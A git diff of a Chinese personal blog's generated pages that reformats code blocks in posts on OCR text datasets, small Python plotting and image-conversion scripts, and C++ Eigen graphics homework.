            axes[0].set_title('Origin')

            axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
            axes[1].axis('off')
            axes[1].set_title('Annotation')

            plt.tight_layout()
            plt.show()
            +
            1
            2
            3
            4
            5
            6
            7
            8
            9
            10
            11
            12
            13
            14
            15
            16
            17
            18
            19
            20
            21
            22
            23
            24
            25
            26
            27
            28
            29
            30
            31
            32
            33
            34
            35
            36
            37
            38
            39
            40
            41
            42
            43
            44
            import cv2
            import os
            import matplotlib.pyplot as plt
            import numpy as np

            index = 463

            image_dir = r'XXX/ICDAR_2015/test_img/'
            label_dir = r'XXX/ICDAR_2015/test_gt/'

            image_path = os.path.join(image_dir, 'img_' + str(index) + '.jpg')
            label_path = os.path.join(label_dir, 'gt_img_' + str(index) + '.txt')

            image_origin = cv2.imread(image_path)
            image = image_origin.copy()
            height, width, _ = image.shape
            label_file = open(label_path, 'r')
            annotations = label_file.readlines()
            label_file.close()

            for annotation in annotations:
            coords = list(map(int, annotation.split(',')[:-1]))
            transcriptions = annotation.split(',')[-1]
            points = np.array([(coords[i], coords[i+1]) for i in range(0, len(coords), 2)])
            cv2.polylines(image, [points], isClosed=True, color=(255, 0, 0), thickness=2)
            for p in points:
            cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

            cv2.putText(image, transcriptions, (points[0][0], points[0][1] - int(min(height, width) / 150)), cv2.FONT_HERSHEY_SIMPLEX,
            min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

            fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
            axes = axes.flatten()

            axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
            axes[0].axis('off')
            axes[0].set_title('Origin')

            axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
            axes[1].axis('off')
            axes[1].set_title('Annotation')

            plt.tight_layout()
            plt.show()

            webp

            -
            1111,459,1266,495,1259,586,1104,550,FESTIVE
            1100,523,1261,603,1244,719,1083,639,SALE
            +
            1
            2
            1111,459,1266,495,1259,586,1104,550,FESTIVE
            1100,523,1261,603,1244,719,1083,639,SALE
            Task 4.2: Text Segmentation (N/A)

            ​ 不可用。

            Task 4.3: Word Recognition (2015 edition)
            @@ -576,7 +574,7 @@

            word_10.png

            ​ 对应 Challenge4_Test_Task3_GT.txt 里的一行:

            -
            word_10.png, "PAIN"
            +
            1
            word_10.png, "PAIN"
            Task 4.4: End to End (2015 edition)

            ​ emmmm 我感觉就是之前的整合,多了一个词汇表。

              @@ -603,10 +601,10 @@

              image_0.jpg

              ​ 对应的 Ground Truth image_0.txt

              ​ 包围框,是否有可识别的文字,对应文字

              -
              390,902,1856,902,1856,1225,390,1225,0,"金氏眼镜"
              1875,1170,2149,1170,2149,1245,1875,1245,0,"创于 1989"
              2054,1277,2190,1277,2190,1323,2054,1323,0,"城建店"
              768,1648,987,1648,987,1714,768,1714,0,"金氏眼"
              897,2152,988,2152,988,2182,897,2182,0,"金氏眼镜"
              1457,2228,1575,2228,1575,2259,1457,2259,0,"金氏眼镜"
              1858,2218,1966,2218,1966,2250,1858,2250,0,"金氏眼镜"
              231,1853,308,1843,309,1885,230,1899,1,"谢#惠顾"
              125,2270,180,2270,180,2288,125,2288,1,"###"
              106,2297,160,2297,160,2316,106,2316,1,"###"
              22,2363,82,2363,82,2383,22,2383,1,"###"
              524,2511,837,2511,837,2554,524,2554,1,"###"
              455,2456,921,2437,920,2478,455,2501,0,"欢迎光临"
              +
              1
              2
              3
              4
              5
              6
              7
              8
              9
              10
              11
              12
              13
              390,902,1856,902,1856,1225,390,1225,0,"金氏眼镜"
              1875,1170,2149,1170,2149,1245,1875,1245,0,"创于 1989"
              2054,1277,2190,1277,2190,1323,2054,1323,0,"城建店"
              768,1648,987,1648,987,1714,768,1714,0,"金氏眼"
              897,2152,988,2152,988,2182,897,2182,0,"金氏眼镜"
              1457,2228,1575,2228,1575,2259,1457,2259,0,"金氏眼镜"
              1858,2218,1966,2218,1966,2250,1858,2250,0,"金氏眼镜"
              231,1853,308,1843,309,1885,230,1899,1,"谢#惠顾"
              125,2270,180,2270,180,2288,125,2288,1,"###"
              106,2297,160,2297,160,2316,106,2316,1,"###"
              22,2363,82,2363,82,2383,22,2383,1,"###"
              524,2511,837,2511,837,2554,524,2554,1,"###"
              455,2456,921,2437,920,2478,455,2501,0,"欢迎光临"

              Total-Text

              ​ 资源:Total-Text Dataset | Papers With Code

              ​ 弯曲文本数据集:

              @@ -637,39 +635,39 @@

              TextSeg

              bpoly_label/ 下对应的逐字分割掩码图a00001_mask.png

              webp

              ​ json 文件 a00001_anno.json

              -
              {
              "0000": {
              "text": "WHY",
              "bbox": [
              300,
              264,
              799,
              264,
              799,
              521,
              300,
              521
              ],
              "char": {
              "00": {
              "text": "W",
              "bbox": [
              304,
              270,
              519,
              270,
              519,
              517,
              304,
              517
              ],
              "mask_value": 1
              },
              "01": {
              "text": "H",
              "bbox": [
              514,
              278,
              650,
              278,
              650,
              521,
              514,
              521
              ],
              "mask_value": 2
              },
              "02": {
              "text": "Y",
              "bbox": [
              651,
              272,
              800,
              272,
              800,
              521,
              651,
              521
              ],
              "mask_value": 3
              }
              }
              },
              "0001": {
              "text": "ME?",
              "bbox": [
              334,
              514,
              762,
              514,
              762,
              764,
              334,
              764
              ],
              "char": {
              "00": {
              "text": "M",
              "bbox": [
              336,
              513,
              518,
              513,
              518,
              761,
              336,
              761
              ],
              "mask_value": 4
              },
              "01": {
              "text": "E",
              "bbox": [
              514,
              514,
              639,
              514,
              639,
              761,
              514,
              761
              ],
              "mask_value": 5
              },
              "02": {
              "text": "?",
              "bbox": [
              637,
              517,
              758,
              517,
              758,
              762,
              637,
              762
              ],
              "mask_value": 6
              }
              }
              }
              }
              +
              1
              2
              3
              4
              5
              6
              7
              8
              9
              10
              11
              12
              13
              14
              15
              16
              17
              18
              19
              20
              21
              22
              23
              24
              25
              26
              27
              28
              29
              30
              31
              32
              33
              34
              35
              36
              37
              38
              39
              40
              41
              42
              43
              44
              45
              46
              47
              48
              49
              50
              51
              52
              53
              54
              55
              56
              57
              58
              59
              60
              61
              62
              63
              64
              65
              66
              67
              68
              69
              70
              71
              72
              73
              74
              75
              76
              77
              78
              79
              80
              81
              82
              83
              84
              85
              86
              87
              88
              89
              90
              91
              92
              93
              94
              95
              96
              97
              98
              99
              100
              101
              102
              103
              104
              105
              106
              107
              108
              109
              110
              111
              112
              113
              114
              115
              116
              {
              "0000": {
              "text": "WHY",
              "bbox": [
              300,
              264,
              799,
              264,
              799,
              521,
              300,
              521
              ],
              "char": {
              "00": {
              "text": "W",
              "bbox": [
              304,
              270,
              519,
              270,
              519,
              517,
              304,
              517
              ],
              "mask_value": 1
              },
              "01": {
              "text": "H",
              "bbox": [
              514,
              278,
              650,
              278,
              650,
              521,
              514,
              521
              ],
              "mask_value": 2
              },
              "02": {
              "text": "Y",
              "bbox": [
              651,
              272,
              800,
              272,
              800,
              521,
              651,
              521
              ],
              "mask_value": 3
              }
              }
              },
              "0001": {
              "text": "ME?",
              "bbox": [
              334,
              514,
              762,
              514,
              762,
              764,
              334,
              764
              ],
              "char": {
              "00": {
              "text": "M",
              "bbox": [
              336,
              513,
              518,
              513,
              518,
              761,
              336,
              761
              ],
              "mask_value": 4
              },
              "01": {
              "text": "E",
              "bbox": [
              514,
              514,
              639,
              514,
              639,
              761,
              514,
              761
              ],
              "mask_value": 5
              },
              "02": {
              "text": "?",
              "bbox": [
              637,
              517,
              758,
              517,
              758,
              762,
              637,
              762
              ],
              "mask_value": 6
              }
              }
              }
              }

              semantic_label/ 下的分割图 a00001_maskfg.png

              webp

              a00001_maskfg.png

              CTW 1500

                -
              • [Paper-Detecting Curve Text in the Wild-New Dataset and New Solution-Zi-Zi’s Journey](…/…/…/…/2023/07/14/Paper-Detecting Curve Text in the Wild-New Dataset and New Solution/)
              • +
              • [Paper-Detecting Curve Text in the Wild-New Dataset and New Solution-Zi-Zi’s Journey](…//Paper-Detecting Curve Text in the Wild-New Dataset and New Solution/)

              合成数据集

              SynthText

              • -

                [Paper-Synthetic Data for Text Localisation in Natural Images-Zi-Zi’s Journey](…/…/…/…/2023/04/21/Paper-Synthetic Data for Text Localisation in Natural Images/)

                +

                [Paper-Synthetic Data for Text Localisation in Natural Images-Zi-Zi’s Journey](…//Paper-Synthetic Data for Text Localisation in Natural Images/)

              • -

                [Paper-重读-Synthetic Data for Text Localisation in Natural Images-Zi-Zi’s Journey](…/…/…/…/2023/09/05/Paper-重读-Synthetic Data for Text Localisation in Natural Images/)

                +

                [Paper-重读-Synthetic Data for Text Localisation in Natural Images-Zi-Zi’s Journey](…//Paper-重读-Synthetic Data for Text Localisation in Natural Images/)

              VISD

                -
              • [Paper-Verisimilar Image Synthesis for Accurate Detection and Recognition of Texts in Scenes-Zi-Zi’s Journey](…/…/…/…/2023/08/25/Paper-Verisimilar Image Synthesis for Accurate Detection and Recognition of Texts in Scenes/)
              • +
              • [Paper-Verisimilar Image Synthesis for Accurate Detection and Recognition of Texts in Scenes-Zi-Zi’s Journey](…//Paper-Verisimilar Image Synthesis for Accurate Detection and Recognition of Texts in Scenes/)

              SynthText3D

                -
              • [Paper-SynthText3D-Synthesizing Scene Text Images from 3D Virtual Worlds-Zi-Zi’s Journey](…/…/…/…/2023/09/12/Paper-SynthText3D-Synthesizing Scene Text Images from 3D Virtual Worlds/)
              • +
              • [Paper-SynthText3D-Synthesizing Scene Text Images from 3D Virtual Worlds-Zi-Zi’s Journey](…//Paper-SynthText3D-Synthesizing Scene Text Images from 3D Virtual Worlds/)

              UnrealText

              • -

                Plan-对论文的目前想法-Zi-Zi’s Journey

                +

                Plan-对论文的目前想法-Zi-Zi’s Journey

              • -

                [Paper-UnrealText-Synthesizing Realistic Scene Text Images from the Unreal World-Zi-Zi’s Journey](…/…/…/…/2023/05/23/Paper-UnrealText-Synthesizing Realistic Scene Text Images from the Unreal World/)

                +

                [Paper-UnrealText-Synthesizing Realistic Scene Text Images from the Unreal World-Zi-Zi’s Journey](…//Paper-UnrealText-Synthesizing Realistic Scene Text Images from the Unreal World/)

              @@ -889,6 +887,8 @@

              目录

              var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Diary-1-\346\242\247\346\241\220\344\270\216\351\223\266\346\235\217/index.html" "b/posts/Diary-1-\346\242\247\346\241\220\344\270\216\351\223\266\346\235\217/index.html" index d28a06b08b..5c44669974 100644 --- "a/posts/Diary-1-\346\242\247\346\241\220\344\270\216\351\223\266\346\235\217/index.html" +++ "b/posts/Diary-1-\346\242\247\346\241\220\344\270\216\351\223\266\346\235\217/index.html" @@ -44,8 +44,6 @@ - - @@ -419,7 +417,7 @@

              前言


              ​ 保定气候播报:

              -
              import matplotlib.pyplot as plt
              import seaborn as sns
              from datetime import datetime

              # 设置 Seaborn 的样式为 darkgrid 风格
              sns.set_style("darkgrid")

              # x轴日期数据
              x = []
              for i in range(14):
              x.append(datetime(2023, 9, 4) + timedelta(days=i))

              # y 轴数据(假设为温度和 PM 值)
              y1 = [20, 22, 21, 21, 22, 20, 19, 18, 14, 15, 14, 17, 19, 19] # 当日最低温
              y2 = [32, 32, 32, 33, 31, 26, 27, 28, 26, 28, 29, 29, 30, 31] # 当日最高温
              y3 = [89, 90, 107, 91, 80, 35, 39, 50, 37, 38, 50, 59, 93, 63] # 当日 PM 值

              # 创建图表和第一个坐标轴
              fig, ax1 = plt.subplots()

              # 绘制第一个 y 轴(温度)
              ax1.plot(x, y1, label='Min Temperature', color='tab:blue')
              ax1.plot(x, y2, label='Max Temperature', color='tab:red')
              ax1.set_xlabel('Date')
              ax1.set_ylabel('Temperature (°C)')
              ax1.tick_params(axis='y')

              # 创建第二个坐标轴,并共享x轴
              ax2 = ax1.twinx()
              # 格式化 x 轴日期字符串,仅保留日
              formatted_dates = [date.strftime('%d') for date in x]

              # 设置x轴刻度和标签
              ax1.set_xticks(x)
              ax1.set_xticklabels(formatted_dates)

              # 绘制第二个 y 轴(PM 值)
              ax2.plot(x, y3, label='PM Value', color='tab:green')
              ax2.set_ylabel('PM Value')
              ax2.tick_params(axis='y')

              # 在每个数据点上添加标记
              for i, val in enumerate(y1):
              ax1.annotate(str(val) + '°C', xy=(x[i], y1[i]), textcoords='offset points', xytext=(0,10), ha='center')

              for i, val in enumerate(y2):
              ax1.annotate(str(val) + '°C', xy=(x[i], y2[i]), textcoords='offset points', xytext=(0,10), ha='center')

              for i, val in enumerate(y3):
              ax2.annotate(str(val), xy=(x[i], y3[i]), textcoords='offset points', xytext=(0,-15), ha='center')

              # 添加图例
              lines = ax1.get_lines() + ax2.get_lines()
              plt.legend(lines, [line.get_label() for line in lines], loc='lower left')

              # 添加标题
              plt.title('Temperature and PM Value')

              # 显示图表
              plt.show()
              +
              1
              2
              3
              4
              5
              6
              7
              8
              9
              10
              11
              12
              13
              14
              15
              16
              17
              18
              19
              20
              21
              22
              23
              24
              25
              26
              27
              28
              29
              30
              31
              32
              33
              34
              35
              36
              37
              38
              39
              40
              41
              42
              43
              44
              45
              46
              47
              48
              49
              50
              51
              52
              53
              54
              55
              56
              57
              58
              59
              60
              import matplotlib.pyplot as plt
              import seaborn as sns
              from datetime import datetime

              # 设置 Seaborn 的样式为 darkgrid 风格
              sns.set_style("darkgrid")

              # x轴日期数据
              x = []
              for i in range(14):
              x.append(datetime(2023, 9, 4) + timedelta(days=i))

              # y 轴数据(假设为温度和 PM 值)
              y1 = [20, 22, 21, 21, 22, 20, 19, 18, 14, 15, 14, 17, 19, 19] # 当日最低温
              y2 = [32, 32, 32, 33, 31, 26, 27, 28, 26, 28, 29, 29, 30, 31] # 当日最高温
              y3 = [89, 90, 107, 91, 80, 35, 39, 50, 37, 38, 50, 59, 93, 63] # 当日 PM 值

              # 创建图表和第一个坐标轴
              fig, ax1 = plt.subplots()

              # 绘制第一个 y 轴(温度)
              ax1.plot(x, y1, label='Min Temperature', color='tab:blue')
              ax1.plot(x, y2, label='Max Temperature', color='tab:red')
              ax1.set_xlabel('Date')
              ax1.set_ylabel('Temperature (°C)')
              ax1.tick_params(axis='y')

              # 创建第二个坐标轴,并共享x轴
              ax2 = ax1.twinx()
              # 格式化 x 轴日期字符串,仅保留日
              formatted_dates = [date.strftime('%d') for date in x]

              # 设置x轴刻度和标签
              ax1.set_xticks(x)
              ax1.set_xticklabels(formatted_dates)

              # 绘制第二个 y 轴(PM 值)
              ax2.plot(x, y3, label='PM Value', color='tab:green')
              ax2.set_ylabel('PM Value')
              ax2.tick_params(axis='y')

              # 在每个数据点上添加标记
              for i, val in enumerate(y1):
              ax1.annotate(str(val) + '°C', xy=(x[i], y1[i]), textcoords='offset points', xytext=(0,10), ha='center')

              for i, val in enumerate(y2):
              ax1.annotate(str(val) + '°C', xy=(x[i], y2[i]), textcoords='offset points', xytext=(0,10), ha='center')

              for i, val in enumerate(y3):
              ax2.annotate(str(val), xy=(x[i], y3[i]), textcoords='offset points', xytext=(0,-15), ha='center')

              # 添加图例
              lines = ax1.get_lines() + ax2.get_lines()
              plt.legend(lines, [line.get_label() for line in lines], loc='lower left')

              # 添加标题
              plt.title('Temperature and PM Value')

              # 显示图表
              plt.show()

              png


              ​ 梧桐与银杏:

              @@ -4611,6 +4609,8 @@

              目录

              var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Diary-10-\345\200\222\344\270\200/index.html" "b/posts/Diary-10-\345\200\222\344\270\200/index.html" index 2b6a94ec86..d3d636cd0f 100644 --- "a/posts/Diary-10-\345\200\222\344\270\200/index.html" +++ "b/posts/Diary-10-\345\200\222\344\270\200/index.html" @@ -51,8 +51,6 @@ - - @@ -418,12 +416,12 @@

              Diary-10-倒一

              @@ -4515,6 +4513,8 @@

              目录

              var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Diary-17-\351\233\217\350\215\267\346\227\245\345\275\223\345\215\210\357\274\201/index.html" "b/posts/Diary-17-\351\233\217\350\215\267\346\227\245\345\275\223\345\215\210\357\274\201/index.html" index 31aec0e90a..4f7d1f0631 100644 --- "a/posts/Diary-17-\351\233\217\350\215\267\346\227\245\345\275\223\345\215\210\357\274\201/index.html" +++ "b/posts/Diary-17-\351\233\217\350\215\267\346\227\245\345\275\223\345\215\210\357\274\201/index.html" @@ -54,8 +54,6 @@ - - @@ -483,7 +481,7 @@

              6.2

              ​ 虽然导师事先说答辩上的老师都是事先打过招呼的,但答辩的时候有个女老师还是提了一些比较尖锐的问题;有些老师就没咋提论文技术方面的问题,化身列文虎克在文章格式上挑刺;还有个老师还迟到了,绝。中间还有个师兄在上面讲完了他的工作,有个老师提问的时候没发现她拿错了论文,笑死。

              ​ 看完上半场,撤!最后走个形式大家都过了。

              bbtime

              - +
            @@ -2158,6 +2156,8 @@

            Diary-暑假!

            + + @@ -2173,8 +2173,6 @@

            Diary-暑假!

            - - @@ -4308,6 +4306,8 @@

            目录

            var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Diary-\346\232\221\346\234\237\345\233\276\351\233\206\357\274\2107 \346\234\210\357\274\211/index.html" "b/posts/Diary-\346\232\221\346\234\237\345\233\276\351\233\206\357\274\2107 \346\234\210\357\274\211/index.html" index f89ce9361e..604b986d2a 100644 --- "a/posts/Diary-\346\232\221\346\234\237\345\233\276\351\233\206\357\274\2107 \346\234\210\357\274\211/index.html" +++ "b/posts/Diary-\346\232\221\346\234\237\345\233\276\351\233\206\357\274\2107 \346\234\210\357\274\211/index.html" @@ -44,8 +44,6 @@ - - @@ -409,7 +407,7 @@

            Diary-暑期图集(7 月)


          -
          import os  # 处理文件和目录
          import sys # 获取命令行参数
          from PIL import Image # 处理图片

          def convert_to_webp(input_file, output_file, quality=80):
          # 函数用于转换一个图片文件
          # input_file: 输入的图片文件路径
          # output_file: 输出的 webp 文件路径
          # quality: webp 文件质量,取值范围 1-100,默认值 80
          try:
          # 打开输入图片文件
          with Image.open(input_file) as im:
          # 保存为 webp 格式
          im.save(output_file, "webp", quality=quality)
          print(f"Converted: {input_file} => {output_file}")
          except Exception as e:
          # 捕获异常
          print(f"Error converting file: {input_file}")
          print(str(e))

          def process_folder(folder_path):
          # 函数用于处理整个文件夹
          # folder_path: 文件夹路径
          for root, dirs, files in os.walk(folder_path):
          for filename in files:
          # 检查文件后缀是否为 jpg/jpeg/png
          if any(filename.lower().endswith(ext) for ext in ['.jpg', '.jpeg', '.png']):
          input_file = os.path.join(root, filename)
          output_file = os.path.splitext(input_file)[0] + ".webp"
          # 调用转换函数
          convert_to_webp(input_file, output_file)

          if __name__ == "__main__":
          # 获取当前脚本路径
          folder_path = r"D:\XXX"
          process_folder(folder_path)
          +
          1
          2
          3
          4
          5
          6
          7
          8
          9
          10
          11
          12
          13
          14
          15
          16
          17
          18
          19
          20
          21
          22
          23
          24
          25
          26
          27
          28
          29
          30
          31
          32
          33
          34
          35
          36
          import os  # 处理文件和目录
          import sys # 获取命令行参数
          from PIL import Image # 处理图片

          def convert_to_webp(input_file, output_file, quality=80):
          # 函数用于转换一个图片文件
          # input_file: 输入的图片文件路径
          # output_file: 输出的 webp 文件路径
          # quality: webp 文件质量,取值范围 1-100,默认值 80
          try:
          # 打开输入图片文件
          with Image.open(input_file) as im:
          # 保存为 webp 格式
          im.save(output_file, "webp", quality=quality)
          print(f"Converted: {input_file} => {output_file}")
          except Exception as e:
          # 捕获异常
          print(f"Error converting file: {input_file}")
          print(str(e))

          def process_folder(folder_path):
          # 函数用于处理整个文件夹
          # folder_path: 文件夹路径
          for root, dirs, files in os.walk(folder_path):
          for filename in files:
          # 检查文件后缀是否为 jpg/jpeg/png
          if any(filename.lower().endswith(ext) for ext in ['.jpg', '.jpeg', '.png']):
          input_file = os.path.join(root, filename)
          output_file = os.path.splitext(input_file)[0] + ".webp"
          # 调用转换函数
          convert_to_webp(input_file, output_file)

          if __name__ == "__main__":
          # 获取当前脚本路径
          folder_path = r"D:\XXX"
          process_folder(folder_path)

          ​ 为了保证网页浏览速度,我决定将推文图片的 jpg 格式全部转为大小更小 webp 格式[1]

          这是正文

          06:57 京畿之门

          @@ -4883,6 +4881,8 @@

          目录

          var highlightShrink = "true"; var HighlightHeightLimit = ""; + + diff --git "a/posts/Diary-\350\246\201\346\266\246\344\272\206\345\206\215\345\210\260\350\216\262\346\261\240\350\275\254\350\275\254\345\220\247/index.html" "b/posts/Diary-\350\246\201\346\266\246\344\272\206\345\206\215\345\210\260\350\216\262\346\261\240\350\275\254\350\275\254\345\220\247/index.html" index a9a3e521ce..7c2402bc6f 100644 --- "a/posts/Diary-\350\246\201\346\266\246\344\272\206\345\206\215\345\210\260\350\216\262\346\261\240\350\275\254\350\275\254\345\220\247/index.html" +++ "b/posts/Diary-\350\246\201\346\266\246\344\272\206\345\206\215\345\210\260\350\216\262\346\261\240\350\275\254\350\275\254\345\220\247/index.html" @@ -44,8 +44,6 @@ - - @@ -4632,6 +4630,8 @@

          目录

          var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Diary-\350\247\243\345\260\201\347\232\204\345\244\247\345\255\246\347\224\237\346\264\273\345\245\275\345\277\253\344\271\220\345\225\212\345\223\210\345\223\210\345\223\210\345\223\210\345\223\210/index.html" "b/posts/Diary-\350\247\243\345\260\201\347\232\204\345\244\247\345\255\246\347\224\237\346\264\273\345\245\275\345\277\253\344\271\220\345\225\212\345\223\210\345\223\210\345\223\210\345\223\210\345\223\210/index.html" index 4c98986ba6..b91b3991c4 100644 --- "a/posts/Diary-\350\247\243\345\260\201\347\232\204\345\244\247\345\255\246\347\224\237\346\264\273\345\245\275\345\277\253\344\271\220\345\225\212\345\223\210\345\223\210\345\223\210\345\223\210\345\223\210/index.html" +++ "b/posts/Diary-\350\247\243\345\260\201\347\232\204\345\244\247\345\255\246\347\224\237\346\264\273\345\245\275\345\277\253\344\271\220\345\225\212\345\223\210\345\223\210\345\223\210\345\223\210\345\223\210/index.html" @@ -44,8 +44,6 @@ - - @@ -4676,6 +4674,8 @@

          目录

          var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Diary-\350\265\243\344\272\206\357\274\214\345\217\210\345\217\210\351\227\275\344\272\206\357\274\210\344\270\200\357\274\211/index.html" "b/posts/Diary-\350\265\243\344\272\206\357\274\214\345\217\210\345\217\210\351\227\275\344\272\206\357\274\210\344\270\200\357\274\211/index.html" index 70beb4aa5e..4f7035bec8 100644 --- "a/posts/Diary-\350\265\243\344\272\206\357\274\214\345\217\210\345\217\210\351\227\275\344\272\206\357\274\210\344\270\200\357\274\211/index.html" +++ "b/posts/Diary-\350\265\243\344\272\206\357\274\214\345\217\210\345\217\210\351\227\275\344\272\206\357\274\210\344\270\200\357\274\211/index.html" @@ -51,8 +51,6 @@ - - @@ -422,12 +420,12 @@

          Diary-赣了,又又闽了(一)

        写一个 compile.sh 便于编译:

        -
        rm -rf build
        mkdir build
        cd build
        cmake ..
        make
        ./Transformation
        cd ../
        +
        1
        2
        3
        4
        5
        6
        7
        rm -rf build
        mkdir build
        cd build
        cmake ..
        make
        ./Transformation
        cd ../

        修改权限:

        -
        chmod a+x compile.sh
        +
        1
        chmod a+x compile.sh

        开跑!

        -
        sh compile.sh
        +
        1
        sh compile.sh

        作业

        写一个用于的 sh:

        -
        rm -rf build
        mkdir build
        cd build
        cmake ..
        make -j4
        cd ../
        +
        1
        2
        3
        4
        5
        6
        rm -rf build
        mkdir build
        cd build
        cmake ..
        make -j4
        cd ../

        示例代码

        -
        #include<cmath>
        #include<eigen3/Eigen/Core>
        #include<eigen3/Eigen/Dense>
        #include<iostream>

        int main(){

        // Basic Example of cpp
        std::cout << "Example of cpp \n";
        float a = 1.0, b = 2.0;
        std::cout << a << std::endl;
        std::cout << a/b << std::endl;
        std::cout << std::sqrt(b) << std::endl;
        std::cout << std::acos(-1) << std::endl;
        std::cout << std::sin(30.0/180.0*acos(-1)) << std::endl;

        // Example of vector
        std::cout << "Example of vector \n";
        // vector definition
        Eigen::Vector3f v(1.0f,2.0f,3.0f);
        Eigen::Vector3f w(1.0f,0.0f,0.0f);
        // vector output
        std::cout << "Example of output \n";
        std::cout << v << std::endl;
        // vector add
        std::cout << "Example of add \n";
        std::cout << v + w << std::endl;
        // vector scalar multiply
        std::cout << "Example of scalar multiply \n";
        std::cout << v * 3.0f << std::endl;
        std::cout << 2.0f * v << std::endl;

        // Example of matrix
        std::cout << "Example of matrix \n";
        // matrix definition
        Eigen::Matrix3f i,j;
        i << 1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0;
        j << 2.0, 3.0, 1.0, 4.0, 6.0, 5.0, 9.0, 7.0, 8.0;
        // matrix output
        std::cout << "Example of output \n";
        std::cout << i << std::endl;
        // matrix add i + j
        // matrix scalar multiply i * 2.0
        // matrix multiply i * j
        // matrix multiply vector i * v

        return 0;
        }
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        25
        26
        27
        28
        29
        30
        31
        32
        33
        34
        35
        36
        37
        38
        39
        40
        41
        42
        43
        44
        45
        46
        47
        48
        #include<cmath>
        #include<eigen3/Eigen/Core>
        #include<eigen3/Eigen/Dense>
        #include<iostream>

        int main(){

        // Basic Example of cpp
        std::cout << "Example of cpp \n";
        float a = 1.0, b = 2.0;
        std::cout << a << std::endl;
        std::cout << a/b << std::endl;
        std::cout << std::sqrt(b) << std::endl;
        std::cout << std::acos(-1) << std::endl;
        std::cout << std::sin(30.0/180.0*acos(-1)) << std::endl;

        // Example of vector
        std::cout << "Example of vector \n";
        // vector definition
        Eigen::Vector3f v(1.0f,2.0f,3.0f);
        Eigen::Vector3f w(1.0f,0.0f,0.0f);
        // vector output
        std::cout << "Example of output \n";
        std::cout << v << std::endl;
        // vector add
        std::cout << "Example of add \n";
        std::cout << v + w << std::endl;
        // vector scalar multiply
        std::cout << "Example of scalar multiply \n";
        std::cout << v * 3.0f << std::endl;
        std::cout << 2.0f * v << std::endl;

        // Example of matrix
        std::cout << "Example of matrix \n";
        // matrix definition
        Eigen::Matrix3f i,j;
        i << 1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0;
        j << 2.0, 3.0, 1.0, 4.0, 6.0, 5.0, 9.0, 7.0, 8.0;
        // matrix output
        std::cout << "Example of output \n";
        std::cout << i << std::endl;
        // matrix add i + j
        // matrix scalar multiply i * 2.0
        // matrix multiply i * j
        // matrix multiply vector i * v

        return 0;
        }

        题目

        给定一个点 $P=(2,1)$, 将该点绕原点先逆时针旋转 $45^\circ$,再平移
        @@ -1095,8 +1093,8 @@

        HW0

        旋转矩阵为 $R(\pi/4)=\begin{bmatrix}\cos \pi/4 & -\sin \pi/4 & 0 \\sin \pi/4 & \cos \pi/4 & 0 \0 & 0 & 1 \end{bmatrix}$

        平移矩阵 $T(1, 2)=\begin{bmatrix}1 & 0 & 1 \0 & 1 & 2 \0 & 0 & 1\end{bmatrix}$

        最终坐标为 $TRP$。

        -
        #include<cmath>
        #include<eigen3/Eigen/Core>
        #include<eigen3/Eigen/Dense>
        #include<iostream>
        #define PI 3.1415926535
        using namespace std;
        using namespace Eigen;

        int main()
        {
        float theta = PI / 4.0f;
        Vector3f P(2.0f, 1.0f, 1.0f);
        Matrix3f R, T;
        R <<
        cos(theta), -sin(theta), 0,
        sin(theta), cos(theta), 0,
        0, 0, 1;
        T <<
        1, 0, 1,
        0, 1, 2,
        0, 0, 1;
        cout << T * R * P << endl;
        return 0;
        }
        -
        1.70711
        4.12132
        1
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        #include<cmath>
        #include<eigen3/Eigen/Core>
        #include<eigen3/Eigen/Dense>
        #include<iostream>
        #define PI 3.1415926535
        using namespace std;
        using namespace Eigen;

        int main()
        {
        float theta = PI / 4.0f;
        Vector3f P(2.0f, 1.0f, 1.0f);
        Matrix3f R, T;
        R <<
        cos(theta), -sin(theta), 0,
        sin(theta), cos(theta), 0,
        0, 0, 1;
        T <<
        1, 0, 1,
        0, 1, 2,
        0, 0, 1;
        cout << T * R * P << endl;
        return 0;
        }
        +
        1
        2
        3
        1.70711
        4.12132
        1

        HW1

        本次作业的任务是填写一个旋转矩阵和一个透视投影矩阵。给定三维下三个点 $v_0(2.0, 0.0,−2.0)$, $v_1(0.0, 2.0,−2.0)$, $v_2(−2.0, 0.0,−2.0)$, 你需要将这三个点的坐标变换为屏幕坐标并在屏幕上绘制出对应的线框三角形(在代码框架中,我们已经提供了draw_triangle 函数,所以你只需要去构建变换矩阵即可)。

        @@ -1105,7 +1103,7 @@

        HW1

      • get_model_matrix(float rotation_angle): 逐个元素地构建模型变换矩阵并返回该矩阵。

      代公式:$$\mathbf{R}_z(\alpha)=\begin{pmatrix}\cos\alpha&-\sin\alpha&0&0\\sin\alpha&\cos\alpha&0&0\0&0&1&0\0&0&0&1\end{pmatrix}$$

      -
      Eigen::Matrix4f get_model_matrix(float rotation_angle)
      {
      Eigen::Matrix4f model = Eigen::Matrix4f::Identity();

      // TODO: Implement this function
      // Create the model matrix for rotating the triangle around the Z axis.
      // Then return it.

      float angle = rotation_angle * MY_PI / 180.0f;

      Eigen::Matrix4f translate;
      translate << std::cos(angle), -std::sin(angle), 0, 0,
      std::sin(angle), std::cos(angle), 0, 0,
      0, 0, 1, 0,
      0, 0, 0, 1;
      model = translate * model;
      return model;
      }
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
